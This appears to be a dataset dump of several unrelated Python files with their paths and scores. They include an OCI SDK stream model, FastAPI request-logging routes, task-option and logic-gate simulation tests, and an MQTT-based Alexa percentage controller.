assert collectors.summary('/', 'tmp') == result
def test_update_repo(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = [
# clone
CompletedProcessMock(''),
# pull --tags
CompletedProcessMock(''),
# log --pretty=format:"%H %at %aN" -n1
CompletedProcessMock('head 23456 author'),
# log --reverse --pretty=format:"%at"
CompletedProcessMock('12345'),
]
result = {
'HEAD': 'head',
'author': 'author',
'date': 23456,
'name': 'tmp',
'start_date': 12345,
}
assert collectors.update_repo('/', ['tmp', 'https://example.com']) == result
def test_update_repo_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('')
assert collectors.update_repo('/', ['tmp', 'https://example.com']) == {} | 0.40028 | 0.225204 |
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateStreamDetails(object):
"""
Object used to create a stream.
"""
def __init__(self, **kwargs):
"""
Initializes a new CreateStreamDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param name:
The value to assign to the name property of this CreateStreamDetails.
:type name: str
:param partitions:
The value to assign to the partitions property of this CreateStreamDetails.
:type partitions: int
:param compartment_id:
The value to assign to the compartment_id property of this CreateStreamDetails.
:type compartment_id: str
:param stream_pool_id:
The value to assign to the stream_pool_id property of this CreateStreamDetails.
:type stream_pool_id: str
:param retention_in_hours:
The value to assign to the retention_in_hours property of this CreateStreamDetails.
:type retention_in_hours: int
:param freeform_tags:
The value to assign to the freeform_tags property of this CreateStreamDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this CreateStreamDetails.
:type defined_tags: dict(str, dict(str, object))
"""
self.swagger_types = {
'name': 'str',
'partitions': 'int',
'compartment_id': 'str',
'stream_pool_id': 'str',
'retention_in_hours': 'int',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))'
}
self.attribute_map = {
'name': 'name',
'partitions': 'partitions',
'compartment_id': 'compartmentId',
'stream_pool_id': 'streamPoolId',
'retention_in_hours': 'retentionInHours',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags'
}
self._name = None
self._partitions = None
self._compartment_id = None
self._stream_pool_id = None
self._retention_in_hours = None
self._freeform_tags = None
self._defined_tags = None
@property
def name(self):
"""
**[Required]** Gets the name of this CreateStreamDetails.
The name of the stream. Avoid entering confidential information.
Example: `TelemetryEvents`
:return: The name of this CreateStreamDetails.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this CreateStreamDetails.
The name of the stream. Avoid entering confidential information.
Example: `TelemetryEvents`
:param name: The name of this CreateStreamDetails.
:type: str
"""
self._name = name
@property
def partitions(self):
"""
**[Required]** Gets the partitions of this CreateStreamDetails.
The number of partitions in the stream.
:return: The partitions of this CreateStreamDetails.
:rtype: int
"""
return self._partitions
@partitions.setter
def partitions(self, partitions):
"""
Sets the partitions of this CreateStreamDetails.
The number of partitions in the stream.
:param partitions: The partitions of this CreateStreamDetails.
:type: int
"""
self._partitions = partitions
@property
def compartment_id(self):
"""
Gets the compartment_id of this CreateStreamDetails.
The OCID of the compartment that contains the stream.
:return: The compartment_id of this CreateStreamDetails.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this CreateStreamDetails.
The OCID of the compartment that contains the stream.
:param compartment_id: The compartment_id of this CreateStreamDetails.
:type: str
"""
self._compartment_id = compartment_id
@property
def stream_pool_id(self):
"""
Gets the stream_pool_id of this CreateStreamDetails.
The OCID of the stream pool that contains the stream.
:return: The stream_pool_id of this CreateStreamDetails.
:rtype: str
"""
return self._stream_pool_id
@stream_pool_id.setter
def stream_pool_id(self, stream_pool_id):
"""
Sets the stream_pool_id of this CreateStreamDetails.
The OCID of the stream pool that contains the stream.
:param stream_pool_id: The stream_pool_id of this CreateStreamDetails.
:type: str
"""
self._stream_pool_id = stream_pool_id
@property
def retention_in_hours(self):
"""
Gets the retention_in_hours of this CreateStreamDetails.
The retention period of the stream, in hours. Accepted values are between 24 and 168 (7 days).
If not specified, the stream will have a retention period of 24 hours.
:return: The retention_in_hours of this CreateStreamDetails.
:rtype: int
"""
return self._retention_in_hours
@retention_in_hours.setter
def retention_in_hours(self, retention_in_hours):
"""
Sets the retention_in_hours of this CreateStreamDetails.
The retention period of the stream, in hours. Accepted values are between 24 and 168 (7 days).
If not specified, the stream will have a retention period of 24 hours.
:param retention_in_hours: The retention_in_hours of this CreateStreamDetails.
:type: int
"""
self._retention_in_hours = retention_in_hours
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this CreateStreamDetails.
Free-form tags for this resource. Each tag is a simple key-value pair that is applied with no predefined name, type, or namespace. Exists for cross-compatibility only.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The freeform_tags of this CreateStreamDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this CreateStreamDetails.
Free-form tags for this resource. Each tag is a simple key-value pair that is applied with no predefined name, type, or namespace. Exists for cross-compatibility only.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param freeform_tags: The freeform_tags of this CreateStreamDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def defined_tags(self):
"""
Gets the defined_tags of this CreateStreamDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The defined_tags of this CreateStreamDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this CreateStreamDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param defined_tags: The defined_tags of this CreateStreamDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other | src/oci/streaming/models/create_stream_details.py |
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateStreamDetails(object):
"""
Object used to create a stream.
"""
def __init__(self, **kwargs):
"""
Initializes a new CreateStreamDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param name:
The value to assign to the name property of this CreateStreamDetails.
:type name: str
:param partitions:
The value to assign to the partitions property of this CreateStreamDetails.
:type partitions: int
:param compartment_id:
The value to assign to the compartment_id property of this CreateStreamDetails.
:type compartment_id: str
:param stream_pool_id:
The value to assign to the stream_pool_id property of this CreateStreamDetails.
:type stream_pool_id: str
:param retention_in_hours:
The value to assign to the retention_in_hours property of this CreateStreamDetails.
:type retention_in_hours: int
:param freeform_tags:
The value to assign to the freeform_tags property of this CreateStreamDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this CreateStreamDetails.
:type defined_tags: dict(str, dict(str, object))
"""
self.swagger_types = {
'name': 'str',
'partitions': 'int',
'compartment_id': 'str',
'stream_pool_id': 'str',
'retention_in_hours': 'int',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))'
}
self.attribute_map = {
'name': 'name',
'partitions': 'partitions',
'compartment_id': 'compartmentId',
'stream_pool_id': 'streamPoolId',
'retention_in_hours': 'retentionInHours',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags'
}
self._name = None
self._partitions = None
self._compartment_id = None
self._stream_pool_id = None
self._retention_in_hours = None
self._freeform_tags = None
self._defined_tags = None
@property
def name(self):
"""
**[Required]** Gets the name of this CreateStreamDetails.
The name of the stream. Avoid entering confidential information.
Example: `TelemetryEvents`
:return: The name of this CreateStreamDetails.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this CreateStreamDetails.
The name of the stream. Avoid entering confidential information.
Example: `TelemetryEvents`
:param name: The name of this CreateStreamDetails.
:type: str
"""
self._name = name
@property
def partitions(self):
"""
**[Required]** Gets the partitions of this CreateStreamDetails.
The number of partitions in the stream.
:return: The partitions of this CreateStreamDetails.
:rtype: int
"""
return self._partitions
@partitions.setter
def partitions(self, partitions):
"""
Sets the partitions of this CreateStreamDetails.
The number of partitions in the stream.
:param partitions: The partitions of this CreateStreamDetails.
:type: int
"""
self._partitions = partitions
@property
def compartment_id(self):
"""
Gets the compartment_id of this CreateStreamDetails.
The OCID of the compartment that contains the stream.
:return: The compartment_id of this CreateStreamDetails.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this CreateStreamDetails.
The OCID of the compartment that contains the stream.
:param compartment_id: The compartment_id of this CreateStreamDetails.
:type: str
"""
self._compartment_id = compartment_id
@property
def stream_pool_id(self):
"""
Gets the stream_pool_id of this CreateStreamDetails.
The OCID of the stream pool that contains the stream.
:return: The stream_pool_id of this CreateStreamDetails.
:rtype: str
"""
return self._stream_pool_id
@stream_pool_id.setter
def stream_pool_id(self, stream_pool_id):
"""
Sets the stream_pool_id of this CreateStreamDetails.
The OCID of the stream pool that contains the stream.
:param stream_pool_id: The stream_pool_id of this CreateStreamDetails.
:type: str
"""
self._stream_pool_id = stream_pool_id
@property
def retention_in_hours(self):
"""
Gets the retention_in_hours of this CreateStreamDetails.
The retention period of the stream, in hours. Accepted values are between 24 and 168 (7 days).
If not specified, the stream will have a retention period of 24 hours.
:return: The retention_in_hours of this CreateStreamDetails.
:rtype: int
"""
return self._retention_in_hours
@retention_in_hours.setter
def retention_in_hours(self, retention_in_hours):
"""
Sets the retention_in_hours of this CreateStreamDetails.
The retention period of the stream, in hours. Accepted values are between 24 and 168 (7 days).
If not specified, the stream will have a retention period of 24 hours.
:param retention_in_hours: The retention_in_hours of this CreateStreamDetails.
:type: int
"""
self._retention_in_hours = retention_in_hours
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this CreateStreamDetails.
Free-form tags for this resource. Each tag is a simple key-value pair that is applied with no predefined name, type, or namespace. Exists for cross-compatibility only.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The freeform_tags of this CreateStreamDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this CreateStreamDetails.
Free-form tags for this resource. Each tag is a simple key-value pair that is applied with no predefined name, type, or namespace. Exists for cross-compatibility only.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param freeform_tags: The freeform_tags of this CreateStreamDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def defined_tags(self):
"""
Gets the defined_tags of this CreateStreamDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The defined_tags of this CreateStreamDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this CreateStreamDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param defined_tags: The defined_tags of this CreateStreamDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other | 0.838018 | 0.318167 |
from sparts.sparts import option
from sparts.vtask import ExecuteContext, VTask
from sparts.tests.base import BaseSpartsTestCase, SingleTaskTestCase
class ExecuteContextTests(BaseSpartsTestCase):
def test_comparisons(self):
self.assertEqual(ExecuteContext(), ExecuteContext())
self.assertEqual(ExecuteContext(item=10), ExecuteContext(item=10))
self.assertNotEqual(ExecuteContext(), ExecuteContext(item=4))
self.assertNotEqual(ExecuteContext(item=3), ExecuteContext(item=4))
self.assertLess(ExecuteContext(item=0), ExecuteContext(item=10))
self.assertGreater(ExecuteContext(item=10), ExecuteContext(item=0))
class VTaskOptionTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(default="ham")
def test_options(self):
self.assertEqual(self.task.basicopt, "spam")
self.assertEqual(self.task.opt_uscore, "eggs")
self.assertEqual(self.task.opt_uscore2, "ham")
class VTaskOptionOverrideTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(name="opt_uscore2", default="ham")
def getCreateArgs(self):
return [
'--TASK-basicopt', 'foo',
'--TASK-opt-uscore', 'bar',
'--TASK-opt-uscore2', 'baz',
]
def test_options(self):
self.assertEqual(self.task.basicopt, "foo")
self.assertEqual(self.task.opt_uscore, "bar")
self.assertEqual(self.task.opt_uscore2, "baz")
class VTaskOptionPrefixTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
OPT_PREFIX = 'my_task'
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(name="opt_uscore2", default="ham")
def test_options(self):
self.assertEqual(self.task.basicopt, "spam")
self.assertEqual(self.task.opt_uscore, "eggs")
self.assertEqual(self.task.opt_uscore2, "ham")
class VTaskOptionPrefixOverrideTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
OPT_PREFIX = 'my_task'
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(name="opt_uscore2", default="ham")
def getCreateArgs(self):
return [
'--my-task-basicopt', 'foo',
'--my-task-opt-uscore', 'bar',
'--my-task-opt-uscore2', 'baz',
]
def test_options(self):
self.assertEqual(self.task.basicopt, "foo")
self.assertEqual(self.task.opt_uscore, "bar")
self.assertEqual(self.task.opt_uscore2, "baz") | tests/test_vtask.py | from sparts.sparts import option
from sparts.vtask import ExecuteContext, VTask
from sparts.tests.base import BaseSpartsTestCase, SingleTaskTestCase
class ExecuteContextTests(BaseSpartsTestCase):
def test_comparisons(self):
self.assertEqual(ExecuteContext(), ExecuteContext())
self.assertEqual(ExecuteContext(item=10), ExecuteContext(item=10))
self.assertNotEqual(ExecuteContext(), ExecuteContext(item=4))
self.assertNotEqual(ExecuteContext(item=3), ExecuteContext(item=4))
self.assertLess(ExecuteContext(item=0), ExecuteContext(item=10))
self.assertGreater(ExecuteContext(item=10), ExecuteContext(item=0))
class VTaskOptionTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(default="ham")
def test_options(self):
self.assertEqual(self.task.basicopt, "spam")
self.assertEqual(self.task.opt_uscore, "eggs")
self.assertEqual(self.task.opt_uscore2, "ham")
class VTaskOptionOverrideTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(name="opt_uscore2", default="ham")
def getCreateArgs(self):
return [
'--TASK-basicopt', 'foo',
'--TASK-opt-uscore', 'bar',
'--TASK-opt-uscore2', 'baz',
]
def test_options(self):
self.assertEqual(self.task.basicopt, "foo")
self.assertEqual(self.task.opt_uscore, "bar")
self.assertEqual(self.task.opt_uscore2, "baz")
class VTaskOptionPrefixTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
OPT_PREFIX = 'my_task'
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(name="opt_uscore2", default="ham")
def test_options(self):
self.assertEqual(self.task.basicopt, "spam")
self.assertEqual(self.task.opt_uscore, "eggs")
self.assertEqual(self.task.opt_uscore2, "ham")
class VTaskOptionPrefixOverrideTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
OPT_PREFIX = 'my_task'
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(name="opt_uscore2", default="ham")
def getCreateArgs(self):
return [
'--my-task-basicopt', 'foo',
'--my-task-opt-uscore', 'bar',
'--my-task-opt-uscore2', 'baz',
]
def test_options(self):
self.assertEqual(self.task.basicopt, "foo")
self.assertEqual(self.task.opt_uscore, "bar")
self.assertEqual(self.task.opt_uscore2, "baz") | 0.630002 | 0.213787 |
import json
from datetime import datetime
from typing import Callable, Optional
import logging
from fastapi import Request, Response
from fastapi.routing import APIRoute
def reformat_body(body: bin, obfuscate: bool = False):
"""
Decodes the binary body into something more useful for logging.
- body - the binary body object from the request or response
- obfuscate (default=False) - will obfuscate all the values in the key-value pairs in the body data.
"""
if body:
try:
# Try to parse as a JSON object and return as a Dict (obfuscated if required)
data = json.loads(body.decode())
if obfuscate:
data = {k: "***" for k, v in data.items()}
return data
except:
# Obfuscate if a body exits and is not JSON
if obfuscate:
return "***"
else:
return body.decode()
else:
return None
class BaseContextRoute(APIRoute):
"""
A router that will log request and response information.
Note that it will only log successful requests.
Inspiration taken from Yagiz's solution
- https://stackoverflow.com/questions/64115628/get-starlette-request-body-in-the-middleware-context
Usage example:
router = APIRouter(route_class=LogContextRout)
@router.post("/endpoint")
async def my_endpoint(body: List[str] = Body(...)):
...
To adjust parameterisation, subclass this and change the parameters.
"""
obfuscate_request_body = False
obfuscate_response_body = False
def get_route_handler(self) -> Callable:
original_route_handler = super().get_route_handler()
async def custom_route_handler(request: Request) -> Response:
start = datetime.utcnow()
response: Response = await original_route_handler(request)
# Decode the request and response body so we can push to the logging
request_content = reformat_body(
await request.body(), obfuscate=self.obfuscate_request_body
)
response_content = reformat_body(
response.body, obfuscate=self.obfuscate_response_body
)
log_data = {
"utc": str(start),
"duration": (datetime.utcnow() - start).total_seconds(),
"ip": request.client.host,
"request": {
"method": request.method,
"hostname": request.url.hostname,
"path": request.url.path,
"querystring": request.url.query,
"body": request_content,
},
"response": {
"status": response.status_code,
"body": response_content,
},
}
self.push_log(log_data)
return response
return custom_route_handler
def push_log(self, log_data: dict):
"""
Method to push the log to wherever you wish.
This by default prints to the console.
Overwrite this method to push the log to where you wish it to go.
"""
print(log_data)
class LogContextRoute(BaseContextRoute):
"""This ContextRoute class pushes the log data to a logger."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._logger = logging.getLogger(__name__)
self._logger.addHandler(logging.NullHandler())
def push_log(self, log_data: dict):
self._logger.info(log_data)
class ObfuscatedRequestContextRoute(BaseContextRoute):
"""This ContextRoute obfuscates the request object only."""
obfuscate_request_body = True | starlette_logging_request_body/router.py | import json
from datetime import datetime
from typing import Callable, Optional
import logging
from fastapi import Request, Response
from fastapi.routing import APIRoute
def reformat_body(body: bin, obfuscate: bool = False):
"""
Decodes the binary body into something more useful for logging.
- body - the binary body object from the request or response
- obfuscate (default=False) - will obfuscate all the values in the key-value pairs in the body data.
"""
if body:
try:
# Try to parse as a JSON object and return as a Dict (obfuscated if required)
data = json.loads(body.decode())
if obfuscate:
data = {k: "***" for k, v in data.items()}
return data
except:
# Obfuscate if a body exits and is not JSON
if obfuscate:
return "***"
else:
return body.decode()
else:
return None
class BaseContextRoute(APIRoute):
"""
A router that will log request and response information.
Note that it will only log successful requests.
Inspiration taken from Yagiz's solution
- https://stackoverflow.com/questions/64115628/get-starlette-request-body-in-the-middleware-context
Usage example:
router = APIRouter(route_class=LogContextRout)
@router.post("/endpoint")
async def my_endpoint(body: List[str] = Body(...)):
...
To adjust parameterisation, subclass this and change the parameters.
"""
obfuscate_request_body = False
obfuscate_response_body = False
def get_route_handler(self) -> Callable:
original_route_handler = super().get_route_handler()
async def custom_route_handler(request: Request) -> Response:
start = datetime.utcnow()
response: Response = await original_route_handler(request)
# Decode the request and response body so we can push to the logging
request_content = reformat_body(
await request.body(), obfuscate=self.obfuscate_request_body
)
response_content = reformat_body(
response.body, obfuscate=self.obfuscate_response_body
)
log_data = {
"utc": str(start),
"duration": (datetime.utcnow() - start).total_seconds(),
"ip": request.client.host,
"request": {
"method": request.method,
"hostname": request.url.hostname,
"path": request.url.path,
"querystring": request.url.query,
"body": request_content,
},
"response": {
"status": response.status_code,
"body": response_content,
},
}
self.push_log(log_data)
return response
return custom_route_handler
def push_log(self, log_data: dict):
"""
Method to push the log to wherever you wish.
This by default prints to the console.
Overwrite this method to push the log to where you wish it to go.
"""
print(log_data)
class LogContextRoute(BaseContextRoute):
"""This ContextRoute class pushes the log data to a logger."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._logger = logging.getLogger(__name__)
self._logger.addHandler(logging.NullHandler())
def push_log(self, log_data: dict):
self._logger.info(log_data)
class ObfuscatedRequestContextRoute(BaseContextRoute):
"""This ContextRoute obfuscates the request object only."""
obfuscate_request_body = True | 0.759315 | 0.211417 |
from unittest import TestCase
from scoville.signal import GenericSignal, DelayedSignal
INPUT_RESISTANCE = 10
LOW = 0.0
HIGH = 5.0
MAX_CURRENT = 0.01
MAX_LOW_VOLTAGE = 0.5
MIN_HIGH_VOLTAGE = 4.5
class AndUnitTests(TestCase):
def testLowLowShouldResultInLow(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", LOW))
circuit.setSignal(GenericSignal("B", LOW))
circuit.inspectVoltage('AND')
circuit.run()
self.assertLess(circuit.getVoltage('AND'), MAX_LOW_VOLTAGE)
def testLowHighShouldResultInLow(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", LOW))
circuit.setSignal(GenericSignal("B", HIGH))
circuit.inspectVoltage('AND')
circuit.run()
self.assertLess(circuit.getVoltage('AND'), MAX_LOW_VOLTAGE)
def testHighLowShouldResultInLow(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(GenericSignal("B", LOW))
circuit.inspectVoltage('AND')
circuit.run()
self.assertLess(circuit.getVoltage('AND'), MAX_LOW_VOLTAGE)
def testHighHighShouldResultInHigh(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(GenericSignal("B", HIGH))
circuit.inspectVoltage('AND')
circuit.run()
self.assertGreater(circuit.getVoltage('AND'), MIN_HIGH_VOLTAGE)
def testShouldNotUseTooMuchCurrent(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(GenericSignal("B", HIGH))
circuit.inspectCurrent('VP5V')
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
circuit.setSignal(GenericSignal("A", LOW))
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
circuit.setSignal(GenericSignal("B", LOW))
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
circuit.setSignal(GenericSignal("A", HIGH))
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
def testShouldSwitchOnIn1ns(self):
circuit = self.getCircuit()
changeTime = 10
endTime = 20
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(DelayedSignal("B", HIGH, delay=changeTime, startValue=LOW, resistance=INPUT_RESISTANCE))
circuit.inspectVoltage('AND')
circuit.run(endTime, 0.001)
self.assertLess(circuit.getMaxVoltage('AND', start=1, end=changeTime), MAX_LOW_VOLTAGE)
self.assertGreater(circuit.getMinVoltage('AND', start=changeTime + 1, end=endTime), MIN_HIGH_VOLTAGE)
def testShouldSwitchOffIn1ns(self):
circuit = self.getCircuit()
changeTime = 10
endTime = 20
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(DelayedSignal("B", value=LOW, delay=changeTime, resistance=INPUT_RESISTANCE, startValue=HIGH))
circuit.inspectVoltage('AND')
circuit.run(endTime, 0.001)
self.assertGreater(circuit.getMinVoltage('AND', start=1, end=changeTime), MIN_HIGH_VOLTAGE)
self.assertLess(circuit.getMaxVoltage('AND', start=changeTime + 1, end=endTime), MAX_LOW_VOLTAGE) | test/unitTests/test_AND.py | from unittest import TestCase
from scoville.signal import GenericSignal, DelayedSignal
INPUT_RESISTANCE = 10
LOW = 0.0
HIGH = 5.0
MAX_CURRENT = 0.01
MAX_LOW_VOLTAGE = 0.5
MIN_HIGH_VOLTAGE = 4.5
class AndUnitTests(TestCase):
def testLowLowShouldResultInLow(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", LOW))
circuit.setSignal(GenericSignal("B", LOW))
circuit.inspectVoltage('AND')
circuit.run()
self.assertLess(circuit.getVoltage('AND'), MAX_LOW_VOLTAGE)
def testLowHighShouldResultInLow(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", LOW))
circuit.setSignal(GenericSignal("B", HIGH))
circuit.inspectVoltage('AND')
circuit.run()
self.assertLess(circuit.getVoltage('AND'), MAX_LOW_VOLTAGE)
def testHighLowShouldResultInLow(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(GenericSignal("B", LOW))
circuit.inspectVoltage('AND')
circuit.run()
self.assertLess(circuit.getVoltage('AND'), MAX_LOW_VOLTAGE)
def testHighHighShouldResultInHigh(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(GenericSignal("B", HIGH))
circuit.inspectVoltage('AND')
circuit.run()
self.assertGreater(circuit.getVoltage('AND'), MIN_HIGH_VOLTAGE)
def testShouldNotUseTooMuchCurrent(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(GenericSignal("B", HIGH))
circuit.inspectCurrent('VP5V')
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
circuit.setSignal(GenericSignal("A", LOW))
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
circuit.setSignal(GenericSignal("B", LOW))
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
circuit.setSignal(GenericSignal("A", HIGH))
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
def testShouldSwitchOnIn1ns(self):
circuit = self.getCircuit()
changeTime = 10
endTime = 20
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(DelayedSignal("B", HIGH, delay=changeTime, startValue=LOW, resistance=INPUT_RESISTANCE))
circuit.inspectVoltage('AND')
circuit.run(endTime, 0.001)
self.assertLess(circuit.getMaxVoltage('AND', start=1, end=changeTime), MAX_LOW_VOLTAGE)
self.assertGreater(circuit.getMinVoltage('AND', start=changeTime + 1, end=endTime), MIN_HIGH_VOLTAGE)
def testShouldSwitchOffIn1ns(self):
circuit = self.getCircuit()
changeTime = 10
endTime = 20
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(DelayedSignal("B", value=LOW, delay=changeTime, resistance=INPUT_RESISTANCE, startValue=HIGH))
circuit.inspectVoltage('AND')
circuit.run(endTime, 0.001)
self.assertGreater(circuit.getMinVoltage('AND', start=1, end=changeTime), MIN_HIGH_VOLTAGE)
self.assertLess(circuit.getMaxVoltage('AND', start=changeTime + 1, end=endTime), MAX_LOW_VOLTAGE) | 0.760028 | 0.621254 |
import logging
from smart_home.mqtt_client import MQTTClient
from smart_home.utils_lambda import get_utc_timestamp, error_response, success_response, get_payload, get_request_message_id, get_mqtt_topics_from_request,\
get_friendly_name_from_request
class PercentageController(object):
@staticmethod
def handle_request(request):
logger = logging.getLogger()
logger.info("PercentageController: Changing the percentage of '%s' ",
get_friendly_name_from_request(request))
percentage = get_payload(request).get("percentage")
percentage_delta = get_payload(request).get("percentageDelta")
if percentage:
key = "percentage"
value = int(percentage)
elif percentage_delta:
key = "percentageDelta"
value = int(percentage_delta)
mqtt_topic_set, mqtt_topic_get = get_mqtt_topics_from_request(request)
message_id = get_request_message_id(request)
resp_payload = MQTTClient.publish_wait_for_resp(
mqtt_topic_set, {"messageId": message_id, "status": {key: value}}, message_id, mqtt_topic_get)
if resp_payload is None:
return error_response(request)
percentage = None
status = resp_payload.get("status")
if status:
percentage = status.get("percentage")
if percentage is not None:
return PercentageController.__response_success(request, percentage)
return error_response(request)
@staticmethod
def __response_success(request, percentage):
payload = {
"context": {
"properties": [
{
"namespace": "Alexa.PercentageController",
"name": "percentage",
"value": int(percentage),
"timeOfSample": get_utc_timestamp(),
"uncertaintyInMilliseconds": 0
}
]
}
}
return success_response(request, payload) | smart_home/percentage_controller.py | import logging
from smart_home.mqtt_client import MQTTClient
from smart_home.utils_lambda import get_utc_timestamp, error_response, success_response, get_payload, get_request_message_id, get_mqtt_topics_from_request,\
get_friendly_name_from_request
class PercentageController(object):
@staticmethod
def handle_request(request):
logger = logging.getLogger()
logger.info("PercentageController: Changing the percentage of '%s' ",
get_friendly_name_from_request(request))
percentage = get_payload(request).get("percentage")
percentage_delta = get_payload(request).get("percentageDelta")
if percentage:
key = "percentage"
value = int(percentage)
elif percentage_delta:
key = "percentageDelta"
value = int(percentage_delta)
